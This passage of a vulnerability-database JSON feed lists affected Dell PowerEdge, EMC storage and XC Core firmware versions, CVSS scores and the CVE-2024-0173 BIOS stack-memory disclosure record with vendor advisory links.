"cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7425:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_storage_nx3240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_storage_nx3240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_storage_nx3340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_storage_nx3340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_6420_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_6420_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc640_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc640_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc940_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc940_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xcxr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xcxr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-04-03T10:15Z", "lastModifiedDate" : "2025-02-04T17:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0173", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability. A local low privileged attacker could potentially exploit this vulnerability to read the contents of non-SMM stack memory." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx760c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx760c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r860:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r960_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r960:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8610t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8610t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8620t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8620t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx750c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx750c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr11_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr11:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr12_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr12:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4510c_firmware:*:*:*:*:*:*:*:*", 